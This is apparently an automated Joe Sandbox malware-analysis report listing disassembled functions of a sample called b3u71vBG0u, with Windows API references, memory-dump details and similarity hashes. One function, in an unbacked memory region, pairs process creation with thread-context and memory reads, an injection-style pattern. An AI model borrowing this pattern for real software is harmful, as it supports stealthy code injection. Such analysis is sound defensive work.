Function 007A8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 007A8FA5

Part of subcall function 00762F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00769C64), ref: 00762FA9
Part of subcall function 00762F95: GetLastError.KERNEL32(00000000,?,00769C64), ref: 00762FBB

_free.LIBCMT ref: 007A8FB6
_free.LIBCMT ref: 007A8FC8

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction ID: 86e442b7dec3a6a1333fee9a4cb1f56abcbf1e4f9a42c7521615020d7353b0d4
Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction Fuzzy Hash: AFE012A1A09B028ECAA4A578AD48AD357EE5F89351B28091DB80ADB143DE2CEC428124

Function 0074AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0078002B

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 2ea75ce40b441c4e6dd81ad7c45952cac3c4e9490eb9c4498250be5cd760c5e2
Instruction ID: e313d73c3ac4b9a4fd21ad3b182ad111d17429021404f180e1ee9b82fe7276df
Opcode Fuzzy Hash: 2ea75ce40b441c4e6dd81ad7c45952cac3c4e9490eb9c4498250be5cd760c5e2
Instruction Fuzzy Hash: B6224974648251DFCB24DF14C494B6ABBE1FF85300F15895DE89A8B362D739EC45CB82

Function 0074492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00744992

Part of subcall function 007635AC: __lock.LIBCMT ref: 007635B2
Part of subcall function 007635AC: DecodePointer.KERNEL32(00000001,?,007449A7,007981BC), ref: 007635BE
Part of subcall function 007635AC: EncodePointer.KERNEL32(?,?,007449A7,007981BC), ref: 007635C9

Part of subcall function 00744A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00744A73
Part of subcall function 00744A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00744A88

Part of subcall function 00743B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00743B7A
Part of subcall function 00743B4C: IsDebuggerPresent.KERNEL32 ref: 00743B8C
Part of subcall function 00743B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,008062F8,008062E0,?,?), ref: 00743BFD
Part of subcall function 00743B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00743C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007449D2

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 8780d25e96f198d10da0839455a325703d466394b3442adfdf0507d4ac6d0e85
Instruction ID: 2fb00775d6437c2a83235c9c1ae667b7d4aa483605ed4985ba440f198f3d58d2
Opcode Fuzzy Hash: 8780d25e96f198d10da0839455a325703d466394b3442adfdf0507d4ac6d0e85
Instruction Fuzzy Hash: BC119A71A08311DBC700EF28EC4990AFFE8FB98710F00851EF445932B1EBB49665CB96

Function 00745DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00745981,?,?,?,?), ref: 00745E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00745981,?,?,?,?), ref: 0077E19C

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d1c4c74d8490f177f6a8645f50fe7032d3e8ad703b18dd565bb0362c384200ff
Instruction ID: 4d7b4f75c6b4dd68caaed3226bd15bdefe9cbc5961ccf4aa359a1d81257b536c
Opcode Fuzzy Hash: d1c4c74d8490f177f6a8645f50fe7032d3e8ad703b18dd565bb0362c384200ff
Instruction Fuzzy Hash: FD015270244718BFF7250E24CC8AF663B9CAB05768F14C319FAE55E1E1C7B85E458B54

Function 00760FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0076594C: __FF_MSGBANNER.LIBCMT ref: 00765963
Part of subcall function 0076594C: __NMSG_WRITE.LIBCMT ref: 0076596A
Part of subcall function 0076594C: RtlAllocateHeap.NTDLL(01670000,00000000,00000001,00000000,?,?,?,00761013,?), ref: 0076598F

std::exception::exception.LIBCMT ref: 0076102C
__CxxThrowException@8.LIBCMT ref: 00761041

Part of subcall function 007687DB: RaiseException.KERNEL32(?,?,?,007FBAF8,00000000,?,?,?,?,00761046,?,007FBAF8,?,00000001), ref: 00768830

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 634bc5eeece2bb348e9337a8040b8ef1d5c3ba0aa3648c8f9908d68c559597de
Instruction ID: 7f166a02144fa770190f14bfd7386555265faf6c0df12369b2f09b2d1d6badca
Opcode Fuzzy Hash: 634bc5eeece2bb348e9337a8040b8ef1d5c3ba0aa3648c8f9908d68c559597de
Instruction Fuzzy Hash: 6BF0283460030DE6CF21BB98EC0D9DF77AC9F00350F640126FC06A2282EFB89A8192D1

Function 0076582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0076585C
__lock_file.LIBCMT ref: 0076587D

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 998173cff1a497950c449fbf1e005fc3fce38157dba8be6a47b2b98914299a8d
Instruction ID: ab62601584eb563cb62a5e8cec8372a9f53888d26269bf4fdd5064b1b53811c3
Opcode Fuzzy Hash: 998173cff1a497950c449fbf1e005fc3fce38157dba8be6a47b2b98914299a8d
Instruction Fuzzy Hash: 7801A771C00A09EBCF12AF69CC0999F7B61AF80360F148315FC166B1A1DB3D8A51EB91

Function 007655D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00768D68: __getptd_noexit.LIBCMT ref: 00768D68

__lock_file.LIBCMT ref: 0076561B

Part of subcall function 00766E4E: __lock.LIBCMT ref: 00766E71

__fclose_nolock.LIBCMT ref: 00765626

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 3ca77da9c438ab2afe7410447002b4968e3e72a52b7da23600ae3541c434f28b
Instruction ID: d8dadbd5701d326020abafa41f4036fbf5a0f15f530cef61153f935acc55019a
Opcode Fuzzy Hash: 3ca77da9c438ab2afe7410447002b4968e3e72a52b7da23600ae3541c434f28b
Instruction Fuzzy Hash: 50F024B1800A04DAD760AF38C80A76E77A12F00B30F548309AC17AB1C1CF7C8941EB56

Function 007481C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0074558F,?,?,?,?,?), ref: 007481DA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0074558F,?,?,?,?,?), ref: 0074820D

Part of subcall function 007478AD: _memmove.LIBCMT ref: 007478E9

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: f49c5efa64b0a6741fc147ee38177e2a294afacc9cc9291f7d1c20dcdde8c694
Instruction ID: 9c4f09b0f8b75a1a24dab14e7373ea6c58645dff173579167771367db1890bc1
Opcode Fuzzy Hash: f49c5efa64b0a6741fc147ee38177e2a294afacc9cc9291f7d1c20dcdde8c694
Instruction Fuzzy Hash: FB01AD31201108BFEB246A26DD4AF7B3B6DEB89760F14802AFD06CD190DE749800D6B2

Function 0239129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 02391ACD
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02391AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02391B13

Memory Dump Source

Source File: 00000000.00000002.1695075216.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2390000_b3u71vBG0u.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction ID: 89446d59b1efcb7dbef45d2ba11d570d5ce9189b4d38be9b84bbc45058c0bc66
Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction Fuzzy Hash: 5112DE24E24658C6EB24DF64D8507DEB232EF69300F1090E9910DEB7A5E77A4F81CF5A

Function 0074F3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 899c8ab1a591682fa55213077536fc8e0a4eb929ea24bd5b0097ed10ef7919b0
Instruction ID: 46bbde34cf83ff2cb70ba9eece2b0f5fefda1041b7164e4cc26d162b262880f2
Opcode Fuzzy Hash: 899c8ab1a591682fa55213077536fc8e0a4eb929ea24bd5b0097ed10ef7919b0
Instruction Fuzzy Hash: 9161AB7060024ADFCB20EF64C885AABB7F5EF44300F14817DE9069B242EB78ED61CB51

Function 00752123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49b1277df17c0fc4202e6fdfdf561aa6f5cdf367d2a69413993e930c7657e7c2
Instruction ID: 8fd4f4954b2698a8316b59ea915f89c608e54281401866618171182642043c45
Opcode Fuzzy Hash: 49b1277df17c0fc4202e6fdfdf561aa6f5cdf367d2a69413993e930c7657e7c2
Instruction Fuzzy Hash: BA51AE35700604EFCF14EB64C999EAE77A6AF85710F148168F946AB383DB38ED05CB51

Function 00745C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00745CF6

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bbfbd0ea48fa89dd1649faee3ca531c4e4b057f8e3a6b2ca8901c8d4d7a1dc6
Instruction ID: 0b65cb014719a9ef90a995094b48699e7013a071f8c756bd0c2a3a1d170de72a
Opcode Fuzzy Hash: 4bbfbd0ea48fa89dd1649faee3ca531c4e4b057f8e3a6b2ca8901c8d4d7a1dc6
Instruction Fuzzy Hash: C2311971A00B1AEBCB18DF6DC484AADB7B5FF48310F148629E81993711D775AD60DBA0

Function 007800D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 007800E1

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 286bde920c36dc2e2f89b4023d17ea2805f438ce061e25422b38667601887035
Instruction ID: 252d20c75f56f16e7420abad576226f49e661d59e951ea2a3507c111d4c4f6df
Opcode Fuzzy Hash: 286bde920c36dc2e2f89b4023d17ea2805f438ce061e25422b38667601887035
Instruction Fuzzy Hash: B041F774604351DFDB14DF14C488B1ABBE1BF45314F1988ACE9994B762C339EC45CB92

Function 00744F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00744D13: FreeLibrary.KERNEL32(00000000,?), ref: 00744D4D

Part of subcall function 0076548B: __wfsopen.LIBCMT ref: 00765496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00744F6F

Part of subcall function 00744CC8: FreeLibrary.KERNEL32(00000000), ref: 00744D02

Part of subcall function 00744DD0: _memmove.LIBCMT ref: 00744E1A

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 12c77ddcac6dad31c2fa1f27be63f26b61958f9f0022de0d89e65969f72cabaf
Instruction ID: 87bb789b30f62de7d826693a7d27977c188fe456ea2a086e741307b018beaa4b
Opcode Fuzzy Hash: 12c77ddcac6dad31c2fa1f27be63f26b61958f9f0022de0d89e65969f72cabaf
Instruction Fuzzy Hash: 4211E732700605EBCF20AF70DC5AFAE77A59F40700F14842DF541A61C1DF799E15AB60

Function 007801AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 007801BB

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 42d785b59a82b85afd896e1423d9119f3703bb1b856f42deaf9e83cf07f0a317
Instruction ID: 41ea29b12a09d5ecb2083a5306110611472f0b10fe05ed2439f49a4b7bb8905b
Opcode Fuzzy Hash: 42d785b59a82b85afd896e1423d9119f3703bb1b856f42deaf9e83cf07f0a317
Instruction Fuzzy Hash: 1B2133B4648351DFCB14DF24C449A1ABBE0BF84304F04896CE99A57761D739E849CB92

Function 007478AD Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007478E9

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: e0b0f1feff7007f9a685850875a5a6e1ea6a23f504afe070e1a0459631d1335c
Instruction ID: 3f16b240ffae19e584e0b958e511a93ccd48bb7e47408a88d860a76d442fd87d
Opcode Fuzzy Hash: e0b0f1feff7007f9a685850875a5a6e1ea6a23f504afe070e1a0459631d1335c
Instruction Fuzzy Hash: 2011C872209219ABC718AF6CD885D7EB39DEF85320714462EFD16C7290DF35AC10C791

Function 00745D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00745807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00745D76

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 09ca232f559dc344d039f3122899c732afd96274be8df544a0710c7bc989b813
Instruction ID: e3c876890542975c436561c4cc8b475f1c3e6a4362317ae9c6137856713e2c0b
Opcode Fuzzy Hash: 09ca232f559dc344d039f3122899c732afd96274be8df544a0710c7bc989b813
Instruction Fuzzy Hash: EB113631600B059FD3308F15C888B62B7E9EF45760F14C92EE4AA86A52D7B8E945CF60

